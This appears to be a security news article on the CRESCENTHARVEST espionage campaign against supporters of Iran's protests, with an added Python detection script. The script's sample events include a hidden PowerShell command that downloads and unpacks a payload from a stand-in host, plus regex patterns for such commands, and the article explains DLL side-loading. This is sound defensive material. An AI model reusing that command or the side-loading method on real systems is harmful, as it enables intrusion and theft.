Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST that is believed to target supporters of the ongoing protests in Iran for information theft and long-term surveillance. The activity was observed from January 9 onward by the Acronis Threat Research Unit, which said the attacks are designed to deploy a remote access trojan and information stealer capable of executing commands, logging keystrokes, and exfiltrating sensitive data. It remains unclear whether the campaign has successfully compromised its intended targets, but the researchers assess that the operation aligns with broader patterns of suspected Iran-aligned cyber espionage.
According to Acronis researchers Subhajeet Singha, Eliad Kimhy, and Darrel Virtusio, the campaign exploits recent geopolitical developments to lure victims into opening malicious Windows shortcut (.LNK) files disguised as protest-related images or videos. The .LNK files are bundled in a RAR archive that also contains authentic media and a Farsi-language report describing updates from what it calls the rebellious cities of Iran. This framing appears designed to build credibility with Farsi-speaking individuals seeking information about the protests. Once executed, the shortcut launches PowerShell code that retrieves an additional ZIP archive while simultaneously opening a benign image or video so the victim sees nothing unusual. The infection chain relies on DLL side-loading through a legitimate Google-signed binary, software_reporter_tool.exe, the Software Reporter component of the Chrome Cleanup Tool, which loads the rogue libraries dropped beside it and thereby activates the malicious functionality. The trick works because Windows resolves a DLL that is not on the KnownDLLs list from the executable's own directory before looking in System32, so a malicious DLL placed next to a signed binary is loaded in place of the real one.
The two primary malicious components identified are urtcbased140d_d.dll, a C++ implant that extracts and decrypts Chrome's App-Bound Encryption keys through COM interfaces, and version.dll, tracked as CRESCENTHARVEST, which functions as the remote access tool. The malware can enumerate installed antivirus products, list local user accounts, harvest system metadata, steal browser credentials, cookies, and Telegram Desktop session data, and record keystrokes. Communication with its command-and-control server, servicelog-information.com, is handled via the Windows WinHTTP APIs, allowing the traffic to blend with normal network activity. Supported commands enable directory listing, file uploads, execution of shell commands, activation of keylogging, and collection of browser history and system information. The researchers noted that the techniques observed reflect established tradecraft, including LNK-based initial access, credential harvesting, and event-driven social engineering. Because the loader is a legitimately signed Google binary, allow-listing by publisher signature alone will not block it; detection needs to key on where the host executable runs from and where its DLLs are loaded from.
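The chain described above (explorer-launched hidden PowerShell download from a shortcut, version.dll side-loaded by software_reporter_tool.exe from a non-system directory, and DNS resolution of the reported C2) is easy to express as telemetry rules. The following Python is an added illustration, not code from Acronis or from the report: the events are constructed inline with Sysmon-style field names (Image, ParentImage, CommandLine, ImageLoaded, QueryName), the user paths and the PowerShell command line are invented, and the hyphenated C2 hostname is assumed from the name given in the report.

```python
"""Toy detection rules for the CRESCENTHARVEST infection chain.

The sample events below are constructed for this example and are not real
telemetry from the campaign. Field names mirror Sysmon (Event ID 1 process
creation, 7 image load, 22 DNS query) so the logic maps onto real logs.
"""
import ntpath
import re

# Constructed sample telemetry (hypothetical paths and command line).
SAMPLE_EVENTS = [
    # Benign: Chrome started normally from its install directory.
    {"EventID": 1, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "chrome.exe"},
    # Suspicious: explorer (user double-clicked the .lnk) spawning hidden
    # PowerShell that fetches a ZIP, as the report describes.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "iwr http://example.invalid/u.zip '
                    '-OutFile $env:TEMP\\u.zip; Expand-Archive $env:TEMP\\u.zip $env:TEMP\\x"'},
    # Benign: the real version.dll loaded from System32.
    {"EventID": 7, "Image": r"C:\Users\u\AppData\Local\Temp\x\software_reporter_tool.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll"},
    # Suspicious: the Google-signed reporter loading version.dll from its own directory.
    {"EventID": 7, "Image": r"C:\Users\u\AppData\Local\Temp\x\software_reporter_tool.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Local\Temp\x\version.dll"},
    # Suspicious: DNS query for the C2 domain named in the report (hyphenation assumed).
    {"EventID": 22, "Image": r"C:\Users\u\AppData\Local\Temp\x\software_reporter_tool.exe",
     "QueryName": "servicelog-information.com"},
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SIDELOAD_HOSTS = {"software_reporter_tool.exe"}          # signed host binary from the report
SIDELOAD_DLLS = {"version.dll", "urtcbased140d_d.dll"}   # DLL names from the report
C2_DOMAINS = {"servicelog-information.com"}              # assumed hyphenation of the reported C2
# Hidden window, encoded command, or download/extract cmdlets in the PowerShell command line.
PS_DOWNLOAD = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-enc\b|\biwr\b|invoke-webrequest|"
                         r"downloadfile|expand-archive)")


def basename(path):
    return ntpath.basename(path).lower()


def dirname(path):
    return ntpath.dirname(path).lower()


def rule_lnk_powershell(ev):
    """LNK-style initial access: explorer.exe spawning hidden PowerShell that downloads."""
    if ev.get("EventID") != 1 or basename(ev["ParentImage"]) != "explorer.exe":
        return None
    if basename(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if not PS_DOWNLOAD.search(ev.get("CommandLine", "")):
        return None
    return "explorer.exe spawned hidden PowerShell download (LNK-style initial access)"


def rule_sideload(ev):
    """DLL side-loading: the reporter binary loading a target DLL from a non-system directory."""
    if ev.get("EventID") != 7:
        return None
    host, dll = basename(ev["Image"]), basename(ev["ImageLoaded"])
    if host not in SIDELOAD_HOSTS or dll not in SIDELOAD_DLLS:
        return None
    dll_dir = dirname(ev["ImageLoaded"])
    if dll == "version.dll" and dll_dir in SYSTEM_DIRS:
        return None  # the genuine Windows DLL; only a copy beside the EXE is suspicious
    return f"{host} loaded {dll} from {dll_dir} (DLL side-loading)"


def rule_c2_dns(ev):
    """DNS resolution of the reported command-and-control hostname."""
    if ev.get("EventID") != 22:
        return None
    if ev.get("QueryName", "").lower().rstrip(".") in C2_DOMAINS:
        return f"DNS query for reported C2 {ev['QueryName']} by {basename(ev['Image'])}"
    return None


RULES = (rule_lnk_powershell, rule_sideload, rule_c2_dns)


def detect(events):
    """Return (event index, rule name, message) for every rule that fires."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((idx, rule.__name__, msg))
    return hits


if __name__ == "__main__":
    for idx, name, msg in detect(SAMPLE_EVENTS):
        print(f"event {idx}: [{name}] {msg}")
```

Run against the constructed events, the three suspicious records (indices 1, 3 and 4) fire one rule each and the two benign ones stay silent. The side-loading rule deliberately ignores version.dll when it comes from System32 or SysWOW64; on real telemetry you would also want to flag the host binary itself running from a user-writable directory rather than its Chrome install location.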
Although unattributed, the campaign is considered likely linked to an Iran-aligned threat actor. It follows a previous operation documented by HarfangLab, which described a cluster called RedKitten targeting non-governmental organizations and individuals documenting human rights abuses in Iran using a backdoor known as SloppyMIO. Acronis stated that Iranian groups such as Charming Kitten and Tortoiseshell have historically employed prolonged social engineering, cultivating relationships with targets over extended periods before delivering malware. The disclosure also comes amid reports that authorities in Iran have tracked protesters' locations via their mobile phones and sent warning messages referencing intelligence monitoring. The digital rights group Holistic Resilience has reported SIM card suspensions affecting individuals posting about the protests online. The researchers assess that such cyber operations form part of a broader digital control framework supported by evolving infrastructure such as the National Information Network and by malware tools including 2Ac2 RAT, enabling sustained remote access to and monitoring of targeted individuals.